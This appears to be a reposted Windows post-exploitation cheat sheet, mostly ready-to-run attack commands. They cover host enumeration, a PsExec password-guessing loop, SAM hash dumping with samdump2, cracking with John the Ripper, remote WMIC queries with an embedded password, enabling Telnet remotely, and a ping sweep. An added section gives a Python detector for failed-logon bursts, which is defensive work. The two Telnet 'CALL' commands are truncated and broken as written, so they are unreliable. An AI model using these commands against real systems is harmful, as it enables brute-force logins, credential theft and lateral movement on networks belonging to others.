Gathering system-related information
C:\>systeminfo

Running services
C:\>tasklist /svc

Installed services
C:\>sc query state= all

Current environment settings
C:\>set

Find username
C:\>set | find "USERNAME"

Find domain
C:\>set | find "USERDOMAIN"

Find current user information
C:\>net user John

Find users with Administrator privileges on the current machine
C:\>net localgroup Administrators
Password guessing with PsExec
Username: Jack | Computer name: XP-INTRANET | Password list: PassList.txt (one candidate per line)
C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************
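Added example, not part of the original post: the loop above leaves a burst of failed-logon events (4625) for one account from one source machine on the target, usually followed by a single success (4624) when a candidate matches. The detector below flags that pattern. It reads a simplified whitespace format (timestamp, event id, account, target host, source workstation) rather than real EVTX records, and the log lines and the source host name PC-JOHN are constructed for this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a simplified format: time, event id, account, target, source.
# 4625 = failed logon, 4624 = successful logon. Jack is hit six times in five seconds
# from PC-JOHN and then logs on; Alice's two isolated failures are normal noise.
SAMPLE_LOG = """\
2011-09-14T10:00:01 4625 Jack XP-INTRANET PC-JOHN
2011-09-14T10:00:02 4625 Jack XP-INTRANET PC-JOHN
2011-09-14T10:00:03 4625 Jack XP-INTRANET PC-JOHN
2011-09-14T10:00:04 4625 Jack XP-INTRANET PC-JOHN
2011-09-14T10:00:05 4625 Jack XP-INTRANET PC-JOHN
2011-09-14T10:00:06 4625 Jack XP-INTRANET PC-JOHN
2011-09-14T10:00:07 4624 Jack XP-INTRANET PC-JOHN
2011-09-14T10:30:00 4625 Alice XP-INTRANET PC-ALICE
2011-09-14T11:45:00 4625 Alice XP-INTRANET PC-ALICE
"""


def parse(log):
    """Turn the simplified log text into (timestamp, event_id, user, host, src) tuples."""
    events = []
    for line in log.splitlines():
        ts, eid, user, host, src = line.split()
        events.append((datetime.fromisoformat(ts), int(eid), user, host, src))
    return events


def find_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Return (user, host, src, max_failures_in_window, success_followed) for every
    account/target/source triple with >= threshold 4625 events inside one window."""
    by_key = defaultdict(list)
    for ts, eid, user, host, src in sorted(events):
        by_key[(user, host, src)].append((ts, eid))
    alerts = []
    for key, evs in by_key.items():
        fails = [ts for ts, eid in evs if eid == 4625]  # already time-ordered
        start, best = 0, 0
        for end in range(len(fails)):           # sliding window over failure times
            while fails[end] - fails[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            # A success after the first failure suggests a candidate password worked.
            success = any(eid == 4624 and ts >= fails[0] for ts, eid in evs)
            alerts.append((*key, best, success))
    return alerts
```

A real deployment would pull the same fields from Security log 4625/4624 records and tune threshold and window to the environment; the logic is unchanged.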
Extract hashes from the SAM and SYSTEM files with samdump2
root@bt:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist
root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt

Gather DNS information
C:\>ipconfig /displaydns

OS information
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion

Installed software
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running processes
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief

Local drives info
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get

Shares info
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table

Network info
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get

List services information
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific service's state
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET

Change a service's start mode so it starts automatically at boot
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Starting the Telnet service
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Ping sweep
C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"
Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html